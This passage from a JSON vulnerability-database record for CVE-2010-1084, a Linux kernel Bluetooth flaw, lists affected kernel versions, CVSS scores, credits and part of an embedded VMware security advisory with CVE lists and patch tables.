                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.43:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27:rc9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.32.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.42:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.27.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Neil Brown",
    "sources": [
      {
        "db": "BID",
        "id": "38898"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2010-1084",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2010-1084",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-1084",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201004-087",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2010-1084",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel 2.6.18 through 2.6.33, and possibly other versions, allows remote attackers to cause a denial of service (memory corruption) via a large number of Bluetooth sockets, related to the size of sysfs files in (1) net/bluetooth/l2cap.c, (2) net/bluetooth/rfcomm/core.c, (3) net/bluetooth/rfcomm/sock.c, and (4) net/bluetooth/sco.c. \nLocal attackers may be able to exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. \nRemote attackers may exploit this issue to cause a denial-of-service condition. \nVersions prior to the Linux kernel 2.6.34-rc2-git1 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2011-0003\nSynopsis:          Third party component updates for VMware vCenter\n                   Server, vCenter Update Manager, ESXi and ESX\nIssue date:        2011-02-10\nUpdated on:        2011-02-10 (initial release of advisory)\nCVE numbers:       --- Apache Tomcat ---\n                   CVE-2009-2693 CVE-2009-2901 CVE-2009-2902\n                   CVE-2009-3548 CVE-2010-2227 CVE-2010-1157\n                   --- Apache Tomcat Manager ---\n                   CVE-2010-2928\n                   --- cURL ---\n                   CVE-2010-0734\n                   --- COS Kernel ---\n                   CVE-2010-1084 CVE-2010-2066 CVE-2010-2070\n                   CVE-2010-2226 CVE-2010-2248 CVE-2010-2521\n                   CVE-2010-2524 CVE-2010-0008 CVE-2010-0415\n                   CVE-2010-0437 CVE-2009-4308 CVE-2010-0003\n                   CVE-2010-0007 CVE-2010-0307 CVE-2010-1086\n                   CVE-2010-0410 CVE-2010-0730 CVE-2010-1085\n                   CVE-2010-0291 CVE-2010-0622 CVE-2010-1087\n                   CVE-2010-1173 CVE-2010-1437 CVE-2010-1088\n                   CVE-2010-1187 CVE-2010-1436 CVE-2010-1641\n                   CVE-2010-3081\n                   --- Microsoft SQL Express ---\n                   CVE-2008-5416 CVE-2008-0085 CVE-2008-0086\n                   CVE-2008-0107 CVE-2008-0106\n                   --- OpenSSL ---\n                   CVE-2010-0740 CVE-2010-0433\n                   CVE-2010-3864 CVE-2010-2939\n                   --- Oracle (Sun) JRE ---\n                   CVE-2009-3555 CVE-2010-0082 CVE-2010-0084\n                   CVE-2010-0085 CVE-2010-0087 CVE-2010-0088\n                   CVE-2010-0089 CVE-2010-0090 CVE-2010-0091\n                   CVE-2010-0092 CVE-2010-0093 CVE-2010-0094\n                   CVE-2010-0095 CVE-2010-0837 CVE-2010-0838\n                   CVE-2010-0839 CVE-2010-0840 CVE-2010-0841\n                   CVE-2010-0842 CVE-2010-0843 CVE-2010-0844\n                   CVE-2010-0845 CVE-2010-0846 CVE-2010-0847\n                   CVE-2010-0848 CVE-2010-0849 CVE-2010-0850\n                   CVE-2010-0886 CVE-2010-3556 CVE-2010-3566\n                   CVE-2010-3567 CVE-2010-3550 CVE-2010-3561\n                   CVE-2010-3573 CVE-2010-3565 CVE-2010-3568\n                   CVE-2010-3569 CVE-2010-1321 CVE-2010-3548\n                   CVE-2010-3551 CVE-2010-3562 CVE-2010-3571\n                   CVE-2010-3554 CVE-2010-3559 CVE-2010-3572\n                   CVE-2010-3553 CVE-2010-3549 CVE-2010-3557\n                   CVE-2010-3541 CVE-2010-3574\n                   --- pam_krb5 ---\n                   CVE-2008-3825 CVE-2009-1384\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere\n   Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues. \n\n\n2. Relevant releases\n\n   vCenter Server 4.1 without Update 1,\n\n   vCenter Update Manager 4.1 without Update 1,\n\n   ESXi 4.1 without patch ESXi410-201101201-SG,\n\n   ESX 4.1 without patch ESX410-201101201-SG. \n\n\n3. Problem Description\n\n a. vCenter Server and vCenter Update Manager update Microsoft\n    SQL Server 2005 Express Edition to Service Pack 3\n\n    Microsoft SQL Server 2005 Express Edition (SQL Express)\n    distributed with vCenter Server 4.1 Update 1 and vCenter Update\n    Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2\n    to SQL Express Service Pack 3, to address multiple security\n    issues that exist in the earlier releases of Microsoft SQL Express. \n\n    Customers using other database solutions need not update for\n    these issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,\n    CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL\n    Express Service Pack 3. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * Hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. vCenter Apache Tomcat Management Application Credential Disclosure\n\n    The Apache Tomcat Manager application configuration file contains\n    logon credentials that can be read by unprivileged local users. \n\n    The issue is resolved by removing the Manager application in\n    vCenter 4.1 Update 1. \n\n    If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon\n    credentials are not present in the configuration file after the\n    update. \n\n    VMware would like to thank Claudio Criscione of Secure Networking\n    for reporting this issue to us. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-2928 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not affected\n    VirtualCenter  2.5       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version\n    1.6.0_21\n\n    Oracle (Sun) JRE update to version 1.6.0_21, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,\n    CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,\n    CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,\n    CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,\n    CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,\n    CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,\n    CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,\n    CVE-2010-0850. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following name to the security issue fixed in\n    Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not applicable **\n    VirtualCenter  2.5       Windows  not applicable **\n\n    Update Manager 